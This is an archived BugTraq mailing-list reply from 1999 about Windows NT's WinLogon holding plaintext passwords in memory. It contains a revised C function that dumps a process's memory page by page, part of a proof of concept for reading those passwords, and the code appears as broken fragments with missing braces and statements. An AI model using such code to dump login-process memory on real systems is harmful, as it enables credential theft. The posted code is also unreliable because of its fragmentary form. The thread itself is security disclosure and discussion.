Re: NT WinLogon VM contains plaintext password visible in admin m

From: Robert Horvick (rhorvickat_private)
Date: Thu Dec 16 1999 - 11:11:21 PST

  • Next message: Bohemian: "Fw: NAV2000 Email Protection DoS"

    Actually there is a large bug in the code (well - it works just as well but
    thousands of times faster and is more correct):
    There is no reason to look beyond the application min and max address range
    and no reason to read in anything other then page sizes (since a
    VirtualAlloc will always round to at least the next largest page size).
    This was how I should have written it to begin with but I got lazy :)
    DWORD DumpMemory(HANDLE hProc, LPSTR szPath)
        LPSTR  lpOffset = 0;
        LPSTR  lpBuf = 0;
        DWORD  dwRead = 0;
        BOOL   bLastRead = FALSE;
        DWORD  dwDumpedBytes = 0;
        SYSTEM_INFO si = {0};
        FILE *f = 0;
        f = fopen(szPath, "wb");
            lpBuf = (LPSTR)malloc(si.dwPageSize + 1);
            for(lpOffset = si.lpMinimumApplicationAddress;
                (void*)lpOffset <= si.lpMaximumApplicationAddress;
                lpOffset += si.dwPageSize)
                if(ReadProcessMemory( hProc,
                        fwrite(lpBuf, 1, dwRead, f);
                        fprintf(f, "\noffset %lx\n", lpOffset);
                        fwrite(lpBuf, 1, dwRead, f);
                        bLastRead = TRUE;
                    dwDumpedBytes += dwRead;
                    lpOffset += si.dwPageSize;
                    bLastRead = FALSE;
            fprintf(stderr, "Unable to open %s", szPath);
        return dwDumpedBytes;
    -----Original Message-----
    From: Jorge_Miguel_Pintoat_private
    Sent: Thursday, December 16, 1999 9:48 AM
    To: rhorvickat_private
    Cc: BUGTRAQat_private
    Subject: RE: NT WinLogon VM contains plaintext password visible in admin
    m ode
    I am sorry, but only read this today...
    There is small bug in this code...
     <!     LPSTR   lpOffset = (void*)1;
     !>     LPSTR   lpOffset = (LPSTR)1;
    This also doesn't work on Windows 2000 Professional, SRV and Adv Srv.

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